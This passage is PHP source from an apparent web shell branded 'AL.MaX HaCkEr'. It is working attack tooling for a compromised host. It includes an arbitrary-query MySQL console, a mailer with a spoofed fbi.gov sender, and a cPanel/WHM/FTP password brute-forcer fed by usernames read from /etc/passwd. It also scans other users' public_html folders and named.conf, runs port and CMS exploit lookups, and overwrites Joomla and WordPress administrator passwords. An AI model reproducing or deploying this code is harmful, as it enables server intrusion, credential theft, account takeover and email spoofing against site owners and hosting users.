- <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
- </form>
- </div> ";
- $columns = array();
- $msg = "<table class=\"explore\" style=\"width:99%;\">";
- $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);
- while(list($column) = @mysql_fetch_row($hasil))
- {
- $msg .= "<th>$column</th>"; $kolum = $column;
- }
- $msg .= "</tr>";
- $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
- list($total) = mysql_fetch_row($hasil);
- if(isset($_GET['z'])) $page = (int) $_GET['z'];
- else $page = 1;
- $pagenum = 100;
- $totpage = ceil($total / $pagenum);
- $start = (($page - 1) * $pagenum);
- $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
- while($datas = @mysql_fetch_assoc($hasil))
- {
- $msg .= "<tr>";
- foreach($datas as $data){ if(trim($data) == "") $data = " "; $msg .= "<td>$data</td>"; }
- $msg .= "</tr>";
- }
- $msg .= "</table>";
- $head = "<div style=\"padding:10px 0 0 6px;\">
- <form action=\"?\" method=\"get\">
- <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
- <input type=\"hidden\" name=\"x\" value=\"mysql\" />
- <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
- <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
- <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
- <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
- <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
- <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
- Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
- for($i = 1;$i <= $totpage;$i++)
- {
- $head .= "<option value=\"".$i."\">".$i."</option>";
- if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>";
- }
- $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>";
- $msg = $msgq.$head.$msg;
- }
- elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != ""))
- {
- $db = $_GET['db'];
- $query = magicboom($_GET['sqlquery']);
- $msg = "<div style=\"width:99%;padding:0 10px;\">
- <form action=\"?\" method=\"get\">
- <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
- <input type=\"hidden\" name=\"x\" value=\"mysql\" />
- <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
- <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
- <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
- <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
- <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
- <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
- <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
- </form>
- </div> ";
- @mysql_select_db($db);
- $querys = explode(";",$query);
- foreach($querys as $query)
- {
- if(trim($query) != "")
- {
- $hasil = mysql_query($query);
- if($hasil)
- {
- $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
- <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>";
- $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>";
- for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";
- $msg .= "</tr>";
- for($i=0;$i<@mysql_num_rows($hasil);$i++)
- {
- $rows=@mysql_fetch_array($hasil);
- $msg .= "<tr>";
- for($j=0;$j<@mysql_num_fields($hasil);$j++)
- {
- if($rows[$j] == "") $dataz = " ";
- else $dataz = $rows[$j];
- $msg .= "<td>".$dataz."</td>";
- }
- $msg .= "</tr>";
- }
- $msg .= "</table>";
- }
- else
- $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query."; <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
- }
- }
- }
- else
- {
- $query = "SHOW PROCESSLIST;\n
- SHOW VARIABLES;\n
- SHOW STATUS;";
- $msg = "<div style=\"width:99%;padding:0 10px;\">
- <form action=\"?\" method=\"get\">
- <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
- <input type=\"hidden\" name=\"x\" value=\"mysql\" />
- <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
- <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
- <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
- <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
- <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
- <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
- <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
- </form>
- </div> ";
- $dbs = array();
- $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
- $hasil = @mysql_list_dbs($con);
- while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); }
- @sort($dbs);
- foreach($dbs as $db)
- {
- $msg .= "<tr><td><a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."\">$db</a></td></tr>";
- }
- $msg .= "</table>";
- }
- @mysql_close($con);
- }
- else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>";
- echo $msg;
- }
- else
- {
- ?>
- <form action="?" method="get">
- <input type="hidden" name="y" value="<?php echo $pwd; ?>" />
- <input type="hidden" name="x" value="mysql" />
- <table class="tabnet" style="width:300px;">
- <tr>
- <th colspan="2">Connect to mySQL server</th>
- </tr>
- <tr>
- <td> Host</td>
- <td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td>
- </tr>
- <tr>
- <td> Username</td>
- <td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td>
- </tr>
- <tr>
- <td> Password</td>
- <td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td>
- </tr>
- <tr>
- <td> Port</td>
- <td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td>
- </tr>
- </table>
- </form>
- <?php
- }
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'mail'))
- {
- if(isset($_POST['mail_send']))
- {
- $mail_to = $_POST['mail_to'];
- $mail_from = $_POST['mail_from'];
- $mail_subject = $_POST['mail_subject'];
- $mail_content = magicboom($_POST['mail_content']);
- if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from"))
- { $msg = "email sent to $mail_to"; }
- else $msg = "send email failed";
- }
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=mail" method="post">
- <table class="cmdbox">
- <tr>
- <td>
- <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey admin, please patch your site :)</textarea>
- </td>
- </tr>
- <tr>
- <td>
- <input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" />
- mail to
- </td>
- </tr>
- <tr>
- <td>
- <input class="inputz" style="width:20%;" type="text" value="AL.MaX HaCkEr0@fbi.gov" name="mail_from" />
- from
- </td>
- </tr>
- <tr>
- <td>
- <input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />
- subject
- </td>
- </tr>
- <tr>
- <td>
- <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" />
- </td>
- </tr>
- <tr>
- <td> <?php echo $msg; ?>
- </td>
- </tr>
- </table>
- </form>
- <?php
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=brute" method="post">
- <?php
- //bruteforce
- @ini_set('memory_limit', 999999999999);
- $connect_timeout=5;
- @set_time_limit(0);
- $pokeng = $_REQUEST['submit'];
- $hn = $_REQUEST['users'];
- $crew = $_REQUEST['passwords'];
- $pasti = $_REQUEST['sasaran'];
- $manualtarget = $_REQUEST['target'];
- $bisa = $_REQUEST['option'];
- if($pasti == ''){
- $pasti = 'localhost';
- }
- if($manualtarget == ''){
- $manualtarget = 'http://localhost:2082';
- }
- function get_users()
- {
- $users = array();
- $rows=file('/etc/passwd');
- if(!$rows) return 0;
- foreach ($rows as $string)
- {
- $user = @explode(":",$string);
- if(substr($string,0,1)!='#') array_push($users,$user[0]);
- }
- return $users;
- }
- if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
- else
- {
- print " <div align='center'>
- <form method='post' style='border: 1px solid #000000'><br><br>
- <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1>
- <tr>
- <td>
- <b> Target ! : </font><input type='text' name='sasaran' size='16' value= $pasti class='inputz'></p></font></b></p>
- <div align='center'><br>
- <TABLE style='BORDER-COLLAPSE: collapse'
- cellSpacing=0
- borderColorDark=#666666
- cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
- <tr> <td align='center'> <b>User</b></td> <td> <p align='center'> <b>Pass</b></td>
- </tr>
- </table>
- <p align='center'>
- <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
- foreach($users as $user) { echo $user."\n"; }
- print"</textarea>
- <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$crew</textarea><br>
- <br>
- <b>Sila pilih : </span><input name='option' value='manual' style='font-weight: 700;' type='radio'> Manual Target Brute : <input type='text' name='target' size='16' class='inputz' value= $manualtarget ><br />
- <input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
- <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp
- <input name='option' value='whm' style='font-weight: 700;' type='radio'> whm ==> <input type='submit' value='Brute !' name='submit' class='inputzbut'></p>
- </td></tr></table></td></tr></form><p align= 'left'>";
- }
- ?>
- <?php
- function manual_check($anjink,$asu,$babi,$lonte){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "$anjink");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
- curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
- curl_setopt($ch, CURLOPT_FAILONERROR, 1);
- $data = curl_exec($ch);
- if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
- elseif ( curl_errno($ch) == 0 ){
- print "<b>[ AL.MaX HaCkEr0@email ]# </b> <b>Completed , Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
- }
- curl_close($ch);
- }
- function ftp_check($link,$user,$pswd,$timeout){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "ftp://$link");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
- curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
- curl_setopt($ch, CURLOPT_USERPWD, "$user:$pswd");
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
- curl_setopt($ch, CURLOPT_FAILONERROR, 1);
- $data = curl_exec($ch);
- if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit; }
- elseif ( curl_errno($ch) == 0 ){
- print "<b>serangan selesai , username = <font color='#FF0000'> $user </font> dan passwordnya = <font color='#FF0000'> $pswd </font></b><br>";
- }
- curl_close($ch);
- }
- function cpanel_check($anjink,$asu,$babi,$lonte){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "http://$anjink:2082");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
- curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
- curl_setopt($ch, CURLOPT_FAILONERROR, 1);
- $data = curl_exec($ch);
- if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
- elseif ( curl_errno($ch) == 0 ){
- print "<b>[ AL.MaX HaCkEr@email ]# </b> <b>Completed, Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
- }
- curl_close($ch);
- }
- function whm_check($anjink,$asu,$babi,$lonte){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "http://$anjink:2086");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
- curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);
- curl_setopt($ch, CURLOPT_FAILONERROR, 1);
- $data = curl_exec($ch);
- if ( curl_errno($ch) == 28 ) { print "<b> Failed! : NEXT TARGET!</b>"; exit;}
- elseif ( curl_errno($ch) == 0 )
- {
- print "<b>[ " . TITLE . " ]# </b> <b>Selesai , Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
- }
- curl_close($ch);
- }
- if(isset($pokeng) && !empty($pokeng))
- {
- $userlist = explode ("\n" , $hn );
- $passlist = explode ("\n" , $crew );
- print "<b>[ " . TITLE . " ]# </b> ATTACK...!!! </font></b><br>";
- foreach ($userlist as $asu)
- {
- $_user = trim($asu);
- foreach ($passlist as $babi )
- {
- $_pass = trim($babi);
- if ($bisa == "manual")
- { manual_check($manualtarget,$_user,$_pass,$lonte); }
- if($bisa == "ftp")
- { ftp_check($pasti,$_user,$_pass,$lonte); }
- if ($bisa == "cpanel")
- { cpanel_check($pasti,$_user,$_pass,$lonte); }
- if ($bisa == "whm")
- { whm_check($pasti,$_user,$_pass,$lonte); }
- }
- }
- }
- }
- //bruteforce
- elseif(isset($_GET['x']) && ($_GET['x'] == 'readable'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=readable" method="post">
- <?php
- //radable public_html
- echo '<html><head><title>AL.MaX HaCkEr Cpanel Finder</title></head><body>';
- ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
- set_time_limit(0);
- ###################
- @$passwd = fopen('/etc/passwd','r');
- if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
- $pub = array();
- $users = array();
- $conf = array();
- $i = 0;
- while(!feof($passwd))
- {
- $str = fgets($passwd);
- if ($i > 35)
- {
- $pos = strpos($str,':');
- $username = substr($str,0,$pos);
- $dirz = '/home/'.$username.'/public_html/';
- if (($username != ''))
- {
- if (is_readable($dirz))
- {
- array_push($users,$username);
- array_push($pub,$dirz);
- }
- }
- }
- $i++;
- }
- ###################
- echo '<br><br>';
- echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br />";
- echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br />";
- echo "[~] Searching for passwords in config files...\n\n"."<br /><br /><br />";
- foreach ($users as $user)
- {
- $path = "/home/$user/public_html/";
- echo "<a href='?y=$path' target='_blank' style='text-shadow:0px 0px 10px #12E12E; font-weight:bold; color:#FF0000;'>$path</a><br>";
- }
- echo "<br><br><br>";
- echo "[+] Copy one of the directories above public_html, then Paste to -> view file / folder <-- that's on the menu --> Explore \n"."<br />";
- echo "[+] Complete...\n"."<br />";
- echo '<br><br></b>
- </body>
- </html>';
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'localdomain'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=localdomain" method="post">
- <?php
- //readable public_html
- echo "<br><br>";
- $file = @implode(@file("/etc/named.conf"));
- if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
- preg_match_all("#named/(.*?).db#",$file ,$r);
- $domains = array_unique($r[1]);
- function check() { (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):""; }
- check();
- echo "<table align=center border=1 width=59% cellpadding=5>
- <tr><td colspan=2>[+] Here We Have : [<font face=calibri size=4 style=color:#FF0000>".count($domains)."</font>] Listed Domains In localhost.</td></tr>
- <tr>
- <td><b>List Of Users</b></td>
- <td><b><font style=color:#0015FF;>List Of Domains</b></td>
- </tr>";
- foreach($domains as $domain)
- {
- $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
- echo "<tr>
- <td><a href='http://www.$domain' target='_blank' style='text-shadow:0px 0px 10px #CC2D4B; font-weight:bold; color:#FF002F;'>$domain</a></td>
- <td>".$user['name']."</td>
- </tr>";
- }
- echo "</table>";
- //radable public_html
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'port-scanner'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=port-scanner" method="post">
- <?php
- echo '<br><br><center><br><b>Port Scanner</b><br>';
- $start = strip_tags($_POST['start']);
- $end = strip_tags($_POST['end']);
- $host = strip_tags($_POST['host']);
- if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
- for($i = $start; $i<=$end; $i++){
- $fp = @fsockopen($host, $i, $errno, $errstr, 3);
- if($fp){
- echo "Port <font style='color:#DE3E3E'>$i</font> is <font style='color:#64CF40'>open</font><br>";
- }
- flush();
- }
- }else{
- echo '
- <input type="hidden" name="y" value="phptools">
- Host:<br />
- <input type="text" style="color:#FF0000;background-color:#000000" name="host" value="localhost"/><br />
- Port start:<br />
- <input type="text" style="color:#FF0000;background-color:#000000" name="start" value="0"/><br />
- Port end:<br />
- <input type="text" style="color:#FF0000;background-color:#000000" name="end" value="5000"/><br />
- <input type="submit" style="color:#FF0000" value="Scan Ports" />
- </form></center>';
- }
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'string-encode'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=string-encode" method="post">
- <?php
- /*
- Simple STRING TO HASH
- Code by Altenator IWnet
- */
- echo "<center><br><br><form method='post'>
- Insert STRING Here : <input type='text' style='color:#FF0000;background-color:#000000' name='hash_input' value='' /><br><br>
- <input type='submit' name='submit_hash' style='color:#FF0000;background-color:#000000' value='Encode' /><br><br>";
- if (isset($_POST['submit_hash'])) {
- if (isset($_POST['hash_input'])) {
- $hash_input = $_POST['hash_input'];
- }
- if ($hash_input=="") { // show error if nothing inserted in input box
- echo 'Nothing Inserted!';
- } else {
- if (isset($hash_input)) {
- foreach (hash_algos() as $hash_setoption) { // set to use all hash function
- $calculate_hash = hash($hash_setoption, $hash_input, false); // calculate all hash and declare variable
- echo "<table border='1'><tbody>";
- echo "<tr><th><font style='color:#9F7CEB'>$hash_setoption</font></th><th><font style='color:#5BC740'>$calculate_hash</font></th></tr>"; // output
- }
- }
- echo '</tbody></table></center>';
- }
- }
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'cms-scanner'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=cms-scanner" method="post">
- <?php
- function ask_exploit_db($component){
- $exploitdb ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$component&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
- $result = @file_get_contents($exploitdb);
- if (eregi("No results",$result)) {
- echo"<td>Not Found</td><td><a href='http://www.google.com/search?hl=en&q=download+$component'>Download</a></td></tr>";
- }else{
- echo"<td><a href='$exploitdb'>Found ..!</a></td><td><--</td></tr>";
- }
- }
- /**************************************************************/
- /* Joomla Conf */
- function get_components($site){
- $source = @file_get_contents($site);
- preg_match_all('{option,(.*?)/}i',$source,$f);
- preg_match_all('{option=(.*?)(&|&|")}i',$source,$f2);
- preg_match_all('{/components/(.*?)/}i',$source,$f3);
- $arz=array_merge($f2[1],$f[1],$f3[1]);
- $coms=array();
- if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
- foreach(array_unique($arz) as $x){
- $coms[]=$x;
- }
- foreach($coms as $comm){
- echo "<tr><td>$comm</td>";
- ask_exploit_db($comm);
- }
- }
- /**************************************************************/
- /* WP Conf */
- function get_plugins($site){
- $source = @file_get_contents($site);
- preg_match_all("#/plugins/(.*?)/#i", $source, $f);
- $plugins=array_unique($f[1]);
- if(count($plugins)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
- foreach($plugins as $plugin){
- echo "<tr><td>$plugin</td>";
- ask_exploit_db($plugin);
- }
- }
- /**************************************************************/
- /* Nuke's Conf */
- function get_numod($site){
- $source = @file_get_contents($site);
- preg_match_all('{?name=(.*?)/}i',$source,$f);
- preg_match_all('{?name=(.*?)(&|&|l_op=")}i',$source,$f2);
- preg_match_all('{/modules/(.*?)/}i',$source,$f3);
- $arz=array_merge($f2[1],$f[1],$f3[1]);
- $coms=array();
- if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
- foreach(array_unique($arz) as $x){
- $coms[]=$x;
- }
- foreach($coms as $nmod){
- echo "<tr><td>$nmod</td>";
- ask_exploit_db($nmod);
- }
- }
- /*****************************************************/
- /* Xoops Conf */
- function get_xoomod($site){
- $source = @file_get_contents($site);
- preg_match_all('{/modules/(.*?)/}i',$source,$f);
- $arz=array_merge($f[1]);
- $coms=array();
- if(count($arz)==0){ echo "<tr><td colspan=3>[~] Nothing Found ..! , Maybe there is some error site or option ... check it .</td></tr>";}
- foreach(array_unique($arz) as $x){
- $coms[]=$x;
- }
- foreach($coms as $xmod){
- echo "<tr><td>$xmod</td>";
- ask_exploit_db($xmod);
- }
- }
- /**************************************************************/
- /* Header */
- function t_header($site){
- echo'<table align="center" border="1" width="50%" cellspacing="1" cellpadding="5">';
- echo'
- <tr id="oo">
- <td>Site : <a href="'.$site.'">'.$site.'</a></td>
- <td>Exploit-db</b></td>
- <td>Exploit it !</td>
- </tr>
- ';
- }
- ?>
- <html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
- <body>
- <p align="center"> </p>
- <p align="center"> </p>
- <p align="center"> </p>
- <form method="POST" action="">
- <p align="center">
- </p>
- <p align="center">
- <font size="4"><br></font></p>
- <p align="center">Site :
- <input type="text" name="site" size="33" style="color:#FF0000;background-color:#000000" value="http://www.site.com/"><select style="color:#FF0000;background-color:#000000" size="1" name="what">
- <option>Wordpress</option>
- <option>Joomla</option>
- <option>Nuke's</option>
- <option>Xoops</option>
- </select><input style="color:#FF0000;background-color:#000000" type="submit" value="Scan"></p>
- </form>
- <?
- // Start Scan :P :P ...
- if($_POST){
- $site=strip_tags(trim($_POST['site']));
- t_header($site);
- echo $x01 = ($_POST['what']=="Wordpress") ? get_plugins($site):"";
- echo $x02 = ($_POST['what']=="Joomla") ? get_components($site):"";
- echo $x03 = ($_POST['what']=="Nuke's") ? get_numod($site):"";
- echo $x04 = ($_POST['what']=="Xoops") ? get_xoomod($site):"";
- echo '</table></body></html>';
- }
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'jm-reset'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=jm-reset" method="post">
- <?php
- @error_reporting(0);
- @ini_set('error_log',NULL);
- echo '
- <div class="com">
- <form method="post">
- <center><br><br><table border="1" bordercolor="#FFFFFF" width="400" cellpadding="1" cellspacing="1">
- <br />
- <tr>
- <td>Host :</td>
- <td><input type="text" style="color:#FF0000;background-color:#000000" name="host" value="localhost" /></td>
- </tr>
- <tr>
- <td>user :</td>
- <td><input type="text" style="color:#FF0000;background-color:#000000" name="user" /></td>
- </tr>
- <tr>
- <td>Pass :</td><td><input style="color:#FF0000;background-color:#000000" type="text" name="pass"/></td>
- </tr>
- <tr>
- <td>db :</td>
- <td><input type="text" style="color:#FF0000;background-color:#000000" name="db" /></td>
- </tr>
- <tr>
- <td>dbprefix :</td>
- <td><input type="text" style="color:#FF0000;background-color:#000000" name="jop" value="jos_users" /></td>
- </tr>
- <tr>
- <td>Admin User :</td>
- <td><input type="text" style="color:#FF0000;background-color:#000000" name="users" value="useradmin" /></td>
- </tr>
- <tr>
- <td>Admin Password :</td>
- <td><input type="text" style="color:#FF0000;background-color:#000000" name="passwd" value="passadmin" /></td>
- </tr>
- <tr>
- <td colspan="6" align="center" style="color:#FF0000;background-color:#000000" width="70%"> <input type="submit" value="SQL" style="color:#FF0000;background-color:#000000" maxlength="30" /> <input type="reset" value="clear" style="color:#FF0000;background-color:#000000" maxlength="30" /> </td>
- </tr>
- </table>
- </form> </div></center>';
- $host = $_POST['host'];
- $user = $_POST['user'];
- $pass = $_POST['pass'];
- $db = $_POST['db'];
- $jop = $_POST['jop'];
- $users = $_POST['users'];
- $admpas = $_POST['passwd'];
- function joomlahash($password) {
- $random = rand();
- $string = md5("$random");
- $yourpassword = "$password";
- $random32 = "$string";
- $join = "$password$random32";
- $md5 = md5("$join");
- $jomlaahash = "$md5:$random32";
- return $jomlaahash;
- }
- if(isset($host) ) {
- $con =@ mysql_connect($host,$user,$pass) or die ;
- $cond =@ mysql_select_db($db) or die;
- $query =@mysql_query("UPDATE $jop SET username ='".$users."' WHERE usertype = Super Administrator");
- $query =@mysql_query("UPDATE $jop SET password ='".joomlahash($admpas)."' WHERE usertype = Super Administrator");
- $query =@mysql_query("UPDATE $jop SET username ='".$users."' WHERE usertype = deprecated");
- $query =@mysql_query("UPDATE $jop SET password ='".joomlahash($admpas)."' WHERE usertype = deprecated");
- }else{
- echo "<center><br /><div class='com'>Enter the database !<br /><br /></div></center>";
- }
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'wp-reset'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=wp-reset" method="post">
- <?php
- @error_reporting(0);
- @ini_set('error_log',NULL);
- echo '
- <div class="com">
- <form method="post">
- <center><br><br><table border="1" bordercolor="#FFFFFF" width="400" cellpadding="1" cellspacing="1">
- <br />
- <tr>
- <td>Host :</td>
- <td><input type="text" name="host" style="color:#FF0000;background-color:#000000" value="localhost" /></td>
- </tr>
- <tr>
- <td>user :</td>
- <td><input type="text" style="color:#FF0000;background-color:#000000" name="user" /></td>
- </tr>
- <tr>
- <td>Pass :</td><td><input type="text" style="color:#FF0000;background-color:#000000" name="pass"/></td>
- </tr>
- <tr>
- <td>db :</td>
- <td><input type="text" style="color:#FF0000;background-color:#000000" name="db" /></td>
- </tr>
- <tr>
- <td>user admin :</td>
- <td><input type="text" style="color:#FF0000;background-color:#000000" name="useradmin" value="admin" /></td>
- </tr>
- <tr>
- <td>pass admin :</td>
- <td><input type="text" style="color:#FF0000;background-color:#000000" name="passadmin" value="admin"/></td>
- </tr>
- <tr>
- <td colspan="6" align="center" width="70%"> <input type="submit" style="color:#FF0000;background-color:#000000" value="SQL" maxlength="30" /> <input type="reset" value="clear" style="color:#FF0000;background-color:#000000" maxlength="30" /> </td>
- </tr>
- </table>
- </form> </div></center>';
- $host = $_POST['host'];
- $user = $_POST['user'];
- $pass = $_POST['pass'];
- $db = $_POST['db'];
- $useradmin = $_POST['useradmin'];
- $pass_ad = $_POST['passadmin'];
- if(isset($host) ) {
- $con =@ mysql_connect($host,$user,$pass) or die ;
- $sedb =@ mysql_select_db($db) or die;
- $crypt = crypt($pass_ad);
- $query =@mysql_query("UPDATE `wp_users` SET `user_login` ='".$useradmin."' WHERE ID = 1") or die('Cant Update ID Number 1');
- $query =@mysql_query("UPDATE `wp_users` SET `user_pass` ='".$crypt."' WHERE ID = 1") or die('Cant Update ID Number 1');
- if ($query)
- {
- echo "<center><br /><div class='com'>Queried !<br /><br /></div></center>";
- }
- else if (!$query)
- {
- echo "error";
- }
- }else
- {
- echo "<center><br /><div class='com'>Enter the database !<br /><br /></div></center>";
- }
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'web-info'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=web-info" method="post">
- <?php
- @set_time_limit(0);
- @error_reporting(0);
- function sws_domain_info($site)
- {
- $getip = @file_get_contents("http://networktools.nl/whois/$site");
- flush();
- $ip = @findit($getip,'<pre>','</pre>');
- return $ip;
- flush();
- }
- function sws_net_info($site)
- {
- $getip = @file_get_contents("http://networktools.nl/asinfo/$site");
- $ip = @findit($getip,'<pre>','</pre>');
- return $ip;
- flush();
- }
- function sws_site_ser($site)
- {
- $getip = @file_get_contents("http://networktools.nl/reverseip/$site");
- $ip = @findit($getip,'<pre>','</pre>');
- return $ip;
- flush();
- }
- function sws_sup_dom($site)
- {
- $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");
- $ip = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">');
- return $ip;
- flush();
- }
- function sws_port_scan($ip)
- {
- $list_post = array('80','21','22','2082','25','53','110','443','143');
- foreach ($list_post as $o_port)
- {
- $connect = @fsockopen($ip,$o_port,$errno,$errstr,5);
- if($connect)
- {
- echo " $ip : $o_port <u style=\"color: #009900\">Open</u> <br /><br />";
- flush();
- }
- }
- }
- function findit($mytext,$starttag,$endtag) {
